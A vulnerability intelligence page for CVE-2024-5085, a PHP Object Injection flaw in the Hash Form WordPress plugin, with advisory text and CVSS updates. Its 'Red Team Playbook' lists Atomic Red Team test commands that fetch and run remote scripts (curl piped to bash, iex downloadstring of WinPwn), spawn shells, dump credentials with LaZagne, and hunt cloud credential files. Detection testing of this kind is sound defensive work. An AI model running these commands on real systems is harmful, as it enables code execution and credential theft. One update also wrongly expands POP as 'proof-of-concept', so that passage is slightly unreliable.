CVE-2024-5085
Overview
This vulnerability is a PHP Object Injection caused by insecure deserialization of untrusted input within the 'process_entry' function of the Hash Form – Drag & Drop Form Builder WordPress plugin. The flaw arises from the plugin's failure to validate or sanitize serialized PHP objects before deserialization, affecting all versions up to and including 1.1.0. The vulnerable component is the form entry processing mechanism that handles user-supplied data.
Vulnerability Description
The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.1.0 via deserialization of untrusted input in the 'process_entry' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
Impact
An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary PHP objects through the form submission process. If a suitable POP chain exists in the environment, this can lead to arbitrary file deletion, sensitive data exposure, or remote code execution. The attack requires network access but no authentication or user interaction, as indicated by the CVSS vector AV:N/AC:H/PR:N/UI:N. Successful exploitation may result in compromise of the affected WordPress site’s confidentiality, integrity, and availability.
Solution
Users of the Hash Form – Drag & Drop Form Builder plugin should upgrade to versions later than 1.1.0, where the vulnerability has been addressed. Detailed patch information and code changes are documented in the WordPress plugin repository changelog (changeset 3090341) and the Wordfence advisory (ID 0166a2b2-24e2-4dd6-8842-d3e8dd7bb0dc). Administrators are advised to apply these updates promptly to mitigate the risk associated with the insecure deserialization flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Hash Form – Drag & Drop Form Builder plugin for WordPress is primarily rooted in its handling of untrusted input during the deserialization process within the 'process_entry' function. This flaw allows for PHP Object Injection, a serious security concern where an attacker can manipulate serialized data to inject malicious PHP objects into the application. The lack of proper validation and sanitization of input data means that any user, even those without authentication, can exploit this weakness. The potential for exploitation is exacerbated by the fact that the plugin does not implement any known protections against such attacks, making it a prime target for malicious actors.
Attack vectors for this vulnerability are varied and can be executed with relative ease. An attacker could craft a malicious request containing serialized data that, when processed by the vulnerable function, results in the instantiation of arbitrary PHP objects. If the target WordPress installation has additional plugins or themes that are susceptible to exploitation through a "Property-Oriented Programming" (POP) chain, the attacker could leverage this to perform a range of malicious actions. These could include deleting critical files, accessing sensitive information, or executing arbitrary code on the server. The ability to perform such actions without authentication significantly lowers the barrier to entry for attackers, making it a high-risk vulnerability.
The real-world implications of this vulnerability are considerable, particularly for businesses that rely on the Hash Form plugin for data collection and user interaction. An attacker exploiting this vulnerability could lead to data breaches, loss of sensitive customer information, and significant reputational damage. The potential for unauthorized access to server resources could also result in operational disruptions, loss of service availability, and financial repercussions stemming from remediation efforts and potential regulatory fines. Furthermore, the ease of exploitation means that even organizations with limited cybersecurity resources could find themselves at risk, highlighting the urgent need for vigilance in maintaining secure web applications.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regular security audits and code reviews of all plugins and themes are essential, particularly for those that handle user input. Utilizing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer. Additionally, organizations should ensure that all software components, including plugins, themes, and the WordPress core, are kept up to date with the latest security patches. Educating developers about secure coding practices, particularly concerning input validation and deserialization, can further reduce the likelihood of similar vulnerabilities being introduced in the future.
In conclusion, the PHP Object Injection vulnerability in the Hash Form – Drag & Drop Form Builder plugin poses a significant threat to WordPress installations. Its ease of exploitation and potential for severe consequences necessitate immediate attention from affected organizations. By adopting proactive security measures and fostering a culture of security awareness, businesses can better protect themselves against such vulnerabilities and mitigate the associated risks.
The CVSS score for CVE-2024-5085 has been revised downward from 9.8 to 8.1 following a reassessment of the vulnerability’s exploitability and impact. This adjustment reflects a more nuanced understanding that, while the PHP Object Injection flaw remains serious, the absence of an inherent proof-of-concept (POP) gadget chain within the plugin limits immediate exploitation potential unless combined with other vulnerable components. CSURFACE threat intelligence confirms that exploit attempts remain infrequent and no new proof-of-concept exploits have surfaced, indicating a stable threat environment. The EPSS score corroborates this stability, showing a low likelihood of exploitation in the near term. For defenders, this recalibration underscores the importance of contextualizing vulnerability severity within the broader ecosystem of installed plugins and themes, as the risk is contingent on the presence of additional exploitable chains. Consequently, the overall threat level, while still high, is moderated by these mitigating factors, suggesting that exploitation requires a more complex attack scenario rather than straightforward remote compromise.
Update 2 — May 21, 2026
The CVSS score for CVE-2024-5085 has been revised upward from 8.1 to 9.8, reflecting a reassessment of the vulnerability’s criticality based on its potential impact and exploitation conditions. This change underscores the severity of the PHP Object Injection flaw in the Hash Form plugin, particularly given that unauthenticated attackers can leverage deserialization of untrusted input to execute malicious actions if a suitable POP chain exists via additional plugins or themes. Although our telemetry continues to show no emergence of new exploit techniques or active exploitation campaigns, the elevated CVSS score signals a heightened risk posture. For defenders, this means that the vulnerability should now be prioritized more urgently within patch management and risk mitigation workflows, especially in environments where the plugin is combined with other components that could facilitate a full exploitation chain. The stable EPSS score indicates that immediate exploitation remains unlikely, but the increased severity rating highlights the potential for significant damage if attackers successfully chain this vulnerability with others. Overall, the threat level is elevated due to the increased exploitability potential and the critical nature of the flaw, warranting closer monitoring and reassessment of exposure in complex WordPress deployments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hashthemes | Hash Form | All |
cpe:2.3:a:hashthemes:hash_form:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-5085 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/0166a2b2-24e2-4dd6-8842-d3e8dd7bb0dc?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/hash-form/trunk/admin/classes/HashFormEntry.php#L353 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3090341/ |